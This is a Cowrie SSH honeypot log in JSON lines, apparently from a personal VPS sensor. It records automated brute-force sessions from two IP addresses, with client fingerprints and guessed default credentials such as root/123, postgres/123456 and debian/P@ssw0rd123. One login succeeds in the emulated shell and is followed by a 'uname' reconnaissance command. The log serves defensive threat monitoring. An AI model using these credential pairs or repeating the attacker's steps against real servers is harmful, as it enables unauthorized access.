{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:05:00.598189Z","src_ip":"212.227.125.160","session":"8743dc72bc06"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:05:00.670993Z","src_ip":"212.227.125.160","session":"8743dc72bc06"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:05:00.889894Z","src_ip":"212.227.125.160","session":"8743dc72bc06"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:02.074395Z","src_ip":"212.227.125.160","session":"8743dc72bc06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51408,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a117917f671","protocol":"ssh","message":"New connection: 212.227.235.229:51408 (1.2.3.4:22) [session: 6a117917f671]","sensor":"my-vps","timestamp":"2025-08-31T01:05:02.894068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:05:03.967755Z","src_ip":"212.227.235.229","session":"6a117917f671"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:05:03.968525Z","src_ip":"212.227.235.229","session":"6a117917f671"}
{"eventid":"cowrie.login.failed","username":"debian","password":"P@ssw0rd123","message":"login attempt [debian/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:05:10.092956Z","src_ip":"212.227.235.229","session":"6a117917f671"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54142,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ccb7221847f","protocol":"ssh","message":"New connection: 212.227.125.160:54142 (1.2.3.4:22) [session: 6ccb7221847f]","sensor":"my-vps","timestamp":"2025-08-31T01:05:11.004095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:05:11.005034Z","src_ip":"212.227.125.160","session":"6ccb7221847f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:05:11.078071Z","src_ip":"212.227.125.160","session":"6ccb7221847f"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:05:11.300970Z","src_ip":"212.227.125.160","session":"6ccb7221847f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:05:11.647296Z","src_ip":"212.227.125.160","session":"6ccb7221847f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:05:11.648019Z","src_ip":"212.227.125.160","session":"6ccb7221847f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:11.722792Z","src_ip":"212.227.125.160","session":"6ccb7221847f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:11.723844Z","src_ip":"212.227.125.160","session":"6ccb7221847f"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:11.996628Z","src_ip":"212.227.235.229","session":"6a117917f671"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51918,"dst_ip":"1.2.3.4","dst_port":22,"session":"25e630507a0e","protocol":"ssh","message":"New connection: 212.227.125.160:51918 (1.2.3.4:22) [session: 25e630507a0e]","sensor":"my-vps","timestamp":"2025-08-31T01:05:21.359977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:05:21.361210Z","src_ip":"212.227.125.160","session":"25e630507a0e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:05:21.434703Z","src_ip":"212.227.125.160","session":"25e630507a0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40362,"dst_ip":"1.2.3.4","dst_port":22,"session":"95ee25937fa1","protocol":"ssh","message":"New connection: 212.227.235.229:40362 (1.2.3.4:22) [session: 95ee25937fa1]","sensor":"my-vps","timestamp":"2025-08-31T01:05:21.550907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:05:21.551840Z","src_ip":"212.227.235.229","session":"95ee25937fa1"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:05:21.655881Z","src_ip":"212.227.125.160","session":"25e630507a0e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:05:21.793957Z","src_ip":"212.227.235.229","session":"95ee25937fa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39420,"dst_ip":"1.2.3.4","dst_port":22,"session":"02928049eb3e","protocol":"ssh","message":"New connection: 212.227.235.229:39420 (1.2.3.4:22) [session: 02928049eb3e]","sensor":"my-vps","timestamp":"2025-08-31T01:05:22.051360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:05:22.053564Z","src_ip":"212.227.235.229","session":"02928049eb3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:05:22.120232Z","src_ip":"212.227.235.229","session":"02928049eb3e"}
{"eventid":"cowrie.login.failed","username":"git","password":"zaqxsw","message":"login attempt [git/zaqxsw] failed","sensor":"my-vps","timestamp":"2025-08-31T01:05:22.426403Z","src_ip":"212.227.235.229","session":"02928049eb3e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:22.766353Z","src_ip":"212.227.125.160","session":"25e630507a0e"}
{"eventid":"cowrie.login.failed","username":"tu","password":"tu123","message":"login attempt [tu/tu123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:05:22.789760Z","src_ip":"212.227.235.229","session":"95ee25937fa1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:23.496935Z","src_ip":"212.227.235.229","session":"02928049eb3e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:24.032251Z","src_ip":"212.227.235.229","session":"95ee25937fa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42444,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fd0fe1d5bf9","protocol":"ssh","message":"New connection: 212.227.125.160:42444 (1.2.3.4:22) [session: 4fd0fe1d5bf9]","sensor":"my-vps","timestamp":"2025-08-31T01:05:25.137565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:05:25.573755Z","src_ip":"212.227.125.160","session":"4fd0fe1d5bf9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:05:25.574497Z","src_ip":"212.227.125.160","session":"4fd0fe1d5bf9"}
{"eventid":"cowrie.login.failed","username":"debian","password":"P@ssw0rd123","message":"login attempt [debian/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:05:28.092344Z","src_ip":"212.227.125.160","session":"4fd0fe1d5bf9"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:29.641907Z","src_ip":"212.227.125.160","session":"4fd0fe1d5bf9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42598,"dst_ip":"1.2.3.4","dst_port":22,"session":"4db33d16a947","protocol":"ssh","message":"New connection: 212.227.125.160:42598 (1.2.3.4:22) [session: 4db33d16a947]","sensor":"my-vps","timestamp":"2025-08-31T01:05:31.645030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:05:31.660291Z","src_ip":"212.227.125.160","session":"4db33d16a947"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:05:31.718441Z","src_ip":"212.227.125.160","session":"4db33d16a947"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:05:32.093980Z","src_ip":"212.227.125.160","session":"4db33d16a947"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:33.242636Z","src_ip":"212.227.125.160","session":"4db33d16a947"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50406,"dst_ip":"1.2.3.4","dst_port":22,"session":"f11b0bec1678","protocol":"ssh","message":"New connection: 212.227.125.160:50406 (1.2.3.4:22) [session: f11b0bec1678]","sensor":"my-vps","timestamp":"2025-08-31T01:05:42.080252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:05:42.081163Z","src_ip":"212.227.125.160","session":"f11b0bec1678"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:05:42.153778Z","src_ip":"212.227.125.160","session":"f11b0bec1678"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:05:42.374800Z","src_ip":"212.227.125.160","session":"f11b0bec1678"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:05:43.535045Z","src_ip":"212.227.125.160","session":"f11b0bec1678"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53366,"dst_ip":"1.2.3.4","dst_port":22,"session":"99b8a0b46504","protocol":"ssh","message":"New connection: 212.227.125.160:53366 (1.2.3.4:22) [session: 99b8a0b46504]","sensor":"my-vps","timestamp":"2025-08-31T01:05:52.468537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:05:52.469280Z","src_ip":"212.227.125.160","session":"99b8a0b46504"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:05:52.542631Z","src_ip":"212.227.125.160","session":"99b8a0b46504"}
